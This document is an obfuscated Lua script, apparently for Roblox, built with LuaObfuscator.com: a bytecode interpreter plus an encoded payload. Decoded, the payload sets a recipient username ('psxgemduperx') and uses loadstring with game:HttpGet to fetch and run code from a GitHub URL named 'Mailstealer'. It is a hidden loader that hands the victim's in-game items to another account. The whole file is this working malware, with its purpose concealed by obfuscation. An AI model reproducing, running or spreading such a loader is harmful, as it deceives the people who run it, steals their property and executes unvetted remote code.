--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.20) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((933 -(857 + 74))^(v32-(2 -1))))%((929 -(214 + 713))^(((v33-(2 -1)) -(v32-(1 + 0))) + ((2148 -(226 + 1044)) -(282 + 595)))) ;return v83-(v83%(1638 -(1523 + 114))) ;else local v84=((12 -9) -1)^(v32-(2 -1)) ;return (((v31%(v84 + v84))>=v84) and ((118 -(32 + 85)) -0)) or ((607 + 12) -(555 + 64)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(958 -(892 + 65))) then return (v37 * (610 -354)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + ((259 + 93) -(87 + 263)) ;v35=181 -(67 + 113) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;return (v41 * ((33220331 -20881491) + 4438376)) + (v40 * ((472484 -212013) -194935)) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,998 -(915 + (512 -(44 + 386))) ,56 -36 ) * (2^(19 + 13))) + v42 ;local v46=v20(v43,27 -6 ,1218 -(1069 + 118) );local v47=((v20(v43,32)==(2 -1)) and  -(1 -0)) or 1 ;if (v46==((1486 -(998 + 488)) + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else local v89=0;while true do if (v89==(0 + 0 + 0)) then v46=(649 + 143) -(368 + 423) ;v44=0 -(772 -(201 + 571)) ;break;end end end elseif (v46==(2065 -(10 + 8))) then return ((v45==(0 -0)) and (v47 * ((443 -(416 + 26))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((1578 -(116 + 1022)) + 583) ) * (v44 + (v45/(((12 -9) -1)^(490 -(145 + 293))))) ;end local function v25(v48)local v49=885 -(261 + 624) ;local v50;local v51;while true do if (v49==(4 -1)) then return v6(v51);end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1;end if (v49==(7 -5)) then v51={};for v90=(2607 -(760 + 987)) -(814 + (1958 -(1789 + 124))) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=7 -4 ;end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2 + 0 ;end if ((480 -(41 + 435))==v52) then v61=nil;while true do if (v53==(1254 -(721 + 530))) then v60=nil;v61=nil;v53=1275 -(945 + 326) ;end if (v53==(4 -2)) then local v96=0 + 0 ;while true do if (v96~=0) then else v58=nil;v59=nil;v96=1 + 0 ;end if (v96==1) then v53=703 -(271 + 429) ;break;end end end if (v53==(0 + 0)) then local v97=1500 -(1408 + 92) ;while true do if (v97~=0) then else v54=1086 -(461 + 625) ;v55=nil;v97=1 + 0 ;end if ((1139 -(782 + 356))==v97) then v53=1289 -(993 + 295) ;break;end end end if (v53==(1 + 3)) then while true do if (v54==(2 -1)) then local v98=0 -0 ;local v99;while true do if (v98==(1092 -(975 + 117))) then v99=0;while true do if (v99==1) then v54=1173 -(418 + 753) ;break;end if (v99~=(1875 -(157 + 1718))) then else local v151=0 + 0 ;while true do if ((0 + 0)==v151) then v57=nil;v58=nil;v151=1 + 0 ;end if (v151==(3 -2)) then v99=1019 -(697 + 321) ;break;end end end end break;end end end if (v54~=0) then else v55=0 -0 ;v56=nil;v54=1;end if (v54~=3) then else v61=nil;while true do local v100=0 -0 ;while true do if (v100==(0 + 0)) then if ((531 -(406 + 123))~=v55) then else local v152=1769 -(1749 + 20) ;while true do if (v152==(1 + 0)) then for v168=1323 -(1249 + 73) ,v23() do local v169=0 + 0 ;local v170;local v171;while true do if (v169==(1146 -(466 + 679))) then while true do if ((0 -0)==v170) then v171=v21();if (v20(v171,873 -(826 + 46) ,948 -(245 + 702) )==(0 -0)) then local v180=1900 -(106 + 1794) ;local v181;local v182;local v183;local v184;while true do if (v180==(3 -2)) then local v190=0 + 0 ;local v191;while true do if (v190==0) then v191=0 + 0 ;while true do if (v191==(1899 -(260 + 1638))) then v180=1 + 1 ;break;end if (v191==0) then v183=nil;v184=nil;v191=441 -(382 + 58) ;end end break;end end end if (v180==(0 -0)) then local v192=0 + 0 ;while true do if ((0 -0)==v192) then v181=114 -(4 + 110) ;v182=nil;v192=1;end if (v192==(585 -(57 + 527))) then v180=1428 -(41 + 1386) ;break;end end end if (v180==(105 -(17 + 86))) then while true do if ((3 -1)==v181) then local v193=0;local v194;while true do if (v193==(0 + 0)) then v194=0 -0 ;while true do if ((2 -1)==v194) then v181=8 -5 ;break;end if (v194~=(166 -(122 + 44))) then else local v203=0;local v204;while true do if (v203==(1690 -(1121 + 569))) then v204=214 -(22 + 192) ;while true do if (v204~=(684 -(483 + 200))) then else v194=1 -0 ;break;end if (v204==(0 -0)) then if (v20(v183,1 + 0 ,1 + 0 )==(1 -0)) then v184[3 -1 ]=v61[v184[67 -(30 + 35) ]];end if (v20(v183,2 + 0 ,564 -(334 + 228) )~=(1258 -(1043 + 214))) then else v184[11 -8 ]=v61[v184[3]];end v204=1 -0 ;end end break;end end end end break;end end end if ((1215 -(323 + 889))~=v181) then else if (v20(v183,3,3)~=(2 -1)) then else v184[584 -(361 + 219) ]=v61[v184[324 -(53 + 267) ]];end v56[v168]=v184;break;end if (v181==1) then local v196=0 + 0 ;local v197;while true do if (v196==0) then v197=0 -0 ;while true do if (v197==(1 + 0)) then v181=415 -(15 + 398) ;break;end if (v197~=(982 -(18 + 964))) then else local v205=0;while true do if (v205~=0) then else v184={v22(),v22(),nil,nil};if (v182==(0 + 0)) then local v206=850 -(20 + 830) ;local v207;local v208;while true do if (1==v206) then while true do if (v207~=0) then else v208=163 -(92 + 71) ;while true do if (v208==(0 + 0)) then v184[3]=v22();v184[130 -(116 + 10) ]=v22();break;end end break;end end break;end if (0==v206) then v207=0 -0 ;v208=nil;v206=766 -(574 + 191) ;end end elseif (v182==(1 + 0)) then v184[741 -(542 + 196) ]=v23();elseif (v182==2) then v184[6 -3 ]=v23() -((4 -2)^(5 + 11)) ;elseif (v182==(852 -(254 + 595))) then local v215=126 -(55 + 71) ;local v216;local v217;while true do if ((0 -0)==v215) then v216=1790 -(573 + 1217) ;v217=nil;v215=1 + 0 ;end if (v215~=(1 + 0)) then else while true do if (v216==(0 -0)) then v217=0 -0 ;while true do if (v217==(1551 -(1126 + 425))) then v184[942 -(714 + 225) ]=v23() -((407 -(118 + 287))^(62 -46)) ;v184[1125 -(118 + 1003) ]=v22();break;end end break;end end break;end end end v205=2 -1 ;end if (v205~=(378 -(142 + 235))) then else v197=4 -3 ;break;end end end end break;end end end if (v181~=(0 + 0)) then else local v198=977 -(553 + 424) ;while true do if (v198==(806 -(118 + 688))) then local v201=0 -0 ;local v202;while true do if (v201==0) then v202=0;while true do if (0==v202) then v182=v20(v171,2 + 0 ,1 + 2 );v183=v20(v171,4,6 + 0 );v202=1;end if (v202==(1 + 0)) then v198=1 + 0 ;break;end end break;end end end if (v198==(1 + 0)) then v181=3 -2 ;break;end end end end break;end end end break;end end break;end if (v169==(0 -0)) then v170=0 -0 ;v171=nil;v169=2 -1 ;end end end v55=1 + 2 ;break;end if ((0 -0)==v152) then local v166=0 -0 ;local v167;while true do if (v166~=(285 -(175 + 110))) then else v167=0 -0 ;while true do if (v167~=(0 -0)) then else for v176=1,v60 do local v177=753 -(239 + 514) ;local v178;local v179;while true do if (v177==1) then if (v178==(1 + 0)) then v179=v21()~=0 ;elseif (v178==(1331 -(797 + 532))) then v179=v24();elseif (v178==(3 + 0)) then v179=v25();end v61[v176]=v179;break;end if (v177~=0) then else local v187=1061 -(810 + 251) ;while true do if (v187==(0 + 0)) then v178=v21();v179=nil;v187=1;end if (v187~=(2 -1)) then else v177=1;break;end end end end end v59[3]=v21();v167=1 + 0 ;end if (v167~=(1203 -(373 + 829))) then else v152=732 -(476 + 255) ;break;end end break;end end end end end if (v55==3) then local v153=1130 -(369 + 761) ;local v154;local v155;while true do if (v153==(1 + 0)) then while true do if (v154==(0 -0)) then v155=0;while true do if (v155==(0 -0)) then local v175=238 -(64 + 174) ;while true do if ((859 -(240 + 619))==v175) then for v188=1 + 0 ,v23() do v57[v188-(1 + 0) ]=v28();end return v59;end end end end break;end end break;end if (v153==(0 -0)) then v154=0;v155=nil;v153=337 -(144 + 192) ;end end end v100=217 -(42 + 174) ;end if (v100~=(1 + 0)) then else if (v55==0) then local v156=1744 -(1344 + 400) ;local v157;while true do if (v156~=(0 + 0)) then else v157=0 + 0 ;while true do if (v157==0) then local v172=0 + 0 ;local v173;while true do if (v172~=0) then else v173=1504 -(363 + 1141) ;while true do if (v173~=(0 -0)) then else local v185=0 -0 ;while true do if (v185==(1740 -(404 + 1335))) then v173=1581 -(1183 + 397) ;break;end if (v185~=(0 -0)) then else v56={};v57={};v185=1 + 0 ;end end end if (v173==(1 + 0)) then v157=1;break;end end break;end end end if ((2 -1)==v157) then v58={};v55=1;break;end end break;end end end if (v55~=(338 -(10 + 327))) then else local v158=0 + 0 ;local v159;local v160;while true do if (v158~=0) then else v159=0;v160=nil;v158=339 -(118 + 220) ;end if (v158==(1 + 0)) then while true do if (v159~=(0 + 0)) then else v160=1975 -(1913 + 62) ;while true do if ((0 + 0)~=v160) then else v59={v56,v57,nil,v58};v60=v23();v160=3 -2 ;end if (v160==(1662 -(1477 + 184))) then v61={};v55=2 -0 ;break;end end break;end end break;end end end break;end end end break;end if (v54==(2 + 0)) then v59=nil;v60=nil;v54=3;end end break;end if (1==v53) then v56=nil;v57=nil;v53=858 -(564 + 292) ;end end break;end if (v52==(2 -0)) then v57=nil;v58=nil;v52=3;end if (v52==3) then v59=nil;v60=nil;v52=2 + 2 ;end if (v52~=(0 -0)) then else v53=1819 -(580 + 1239) ;v54=nil;v52=305 -(244 + 60) ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=11) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3];elseif (v81==1) then local v114=v80[2];v78[v114]=v78[v114](v13(v78,v114 + 1 ,v73));else v78[v80[2]]();end elseif (v81<=3) then local v103=v80[2];local v104,v105=v71(v78[v103](v13(v78,v103 + 1 ,v80[3])));v73=(v105 + v103) -1 ;local v106=0;for v111=v103,v73 do v106=v106 + 1 ;v78[v111]=v104[v106];end elseif (v81==4) then local v116=v80[2];v78[v116]=v78[v116](v13(v78,v116 + 1 ,v73));else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=8) then if (v81<=6) then v72=v80[3];elseif (v81==7) then v78[v80[2]]();else v64[v80[3]]=v78[v80[2]];end elseif (v81<=9) then v78[v80[2]]=v80[3];elseif (v81==10) then do return;end else v72=v80[3];end elseif (v81<=17) then if (v81<=14) then if (v81<=12) then do return;end elseif (v81>13) then local v122=v80[2];local v123=v78[v80[3]];v78[v122 + 1 ]=v123;v78[v122]=v123[v80[4]];else local v127=0;local v128;local v129;while true do if (v127==0) then v128=v80[2];v129=v78[v80[3]];v127=1;end if (v127==1) then v78[v128 + 1 ]=v129;v78[v128]=v129[v80[4]];break;end end end elseif (v81<=15) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==16) then for v140=v80[2],v80[3] do v78[v140]=nil;end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=20) then if (v81<=18) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>19) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else v64[v80[3]]=v78[v80[2]];end elseif (v81<=21) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81==22) then for v142=v80[2],v80[3] do v78[v142]=nil;end else local v136=v80[2];local v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v138 + v136) -1 ;local v139=0;for v144=v136,v73 do v139=v139 + 1 ;v78[v144]=v137[v139];end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003043O0075736572030C3O0070737867656D647570657278030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400163O0012093O00014O0016000100013O0026113O00020001000100040B3O00020001001209000100013O002611000100050001000100040B3O00050001001209000200033O001208000200023O001214000200043O001214000300053O00200E000300030006001209000500074O0005000600014O0017000300064O000400023O00022O000200020001000100040B3O0015000100040B3O0005000100040B3O0015000100040B3O000200012O000A3O00017O00",v9(),...);